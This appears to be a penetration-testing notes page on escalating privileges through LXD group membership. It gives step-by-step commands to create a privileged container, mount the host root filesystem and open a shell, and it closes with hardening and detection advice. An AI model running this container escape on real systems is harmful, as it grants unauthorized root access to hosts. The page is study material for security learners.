LXC Privilege Escalation Techniques

Check Group Membership

Check if the user is part of the lxd group, which may allow container escapes.

id

View available LXC images for deployment.

lxc image list

Check running or existing LXD containers.

lxc list

Import a vulnerable LXC image for privilege escalation.

lxc image import ubuntu-template.tar.xz --alias ubuntutemp

Create a new privileged container that may allow access to the host.

lxc init ubuntutemp privesc -c security.privileged=true

Bind the host's root filesystem inside the container.

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc

Gain access to the container's shell.

lxc exec privesc /bin/bash

ls -l /mnt/root

If a container is already running, mount the host's root filesystem dynamically.

lxc config device add <container_name> host-root disk source=/ path=/mnt/root recursive=true

lxc exec <container_name> /bin/bash

ls -l /mnt/root

Determine if a container is running with elevated privileges.

lxc config show <container_name> | grep security.privileged

View existing LXD profiles that define container configurations.

lxc profile list

Inspect the configuration of a specific profile.

lxc profile show <profile_name>

Containers vs. VMs: You correctly highlighted the difference between OS-level virtualization (containers) and hardware-level virtualization (VMs).
LXC/LXD:
- LXC: Application containers, sharing the host kernel.
- LXD: System containers, running a complete OS.
Privilege Escalation: The primary goal is to escape the container and gain root access on the host system.
LXD Group: Membership in the lxd or lxc group is often a prerequisite for exploiting LXD.
Vulnerable Templates: Pre-existing container templates with weak security configurations (e.g., no passwords, privileged settings) are often the attack vector.
security.privileged=true: This is the critical setting that disables container isolation, allowing access to the host.
Host Root Mounting: Mounting the host's root filesystem into the container allows direct access to host files.

Check Group Membership: id
Locate Vulnerable Templates: ls in relevant directories.
Import the Image: lxc image import ubuntu-template.tar.xz --alias ubuntutemp
List Images: lxc image list
Initialize a Privileged Container: lxc init ubuntutemp privesc -c security.privileged=true
Mount Host Root: lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Start the Container: lxc start privesc
Execute a Shell: lxc exec privesc /bin/bash
Access Host Files: ls -l /mnt/root

Security Best Practices:
- Avoid using privileged containers unless absolutely necessary.
- Use strong passwords for container images.
- Regularly update container images.
- Implement proper access controls.
- Use namespaces and cgroups to further isolate containers.
Attack Vectors:
- Besides vulnerable templates, other attack vectors include exploiting vulnerabilities in the LXD daemon itself or misconfigurations in container profiles.
- Exploiting mounted volumes that are not the root directory.
Capabilities: Container escape can also happen by abusing linux capabilities.
Detection:
- Monitor for unusual container activity.
- Audit container configurations.
- Use security tools to scan for vulnerabilities.
Containerization Security:
- Understanding container security is crucial in modern IT environments.
- Tools like Docker Bench for Security and Lynis can help assess container security.
Namespaces: Reinforce the importance of namespaces in container security.
Cgroups: Reinforce the importance of Cgroups in container security.
Real World Examples: Researching real world container escapes will help solidify understanding of the attack vectors.
LXD profiles: Understanding how LXD profiles work, and how they can be misconfigured is very important.

Last updated 5 months ago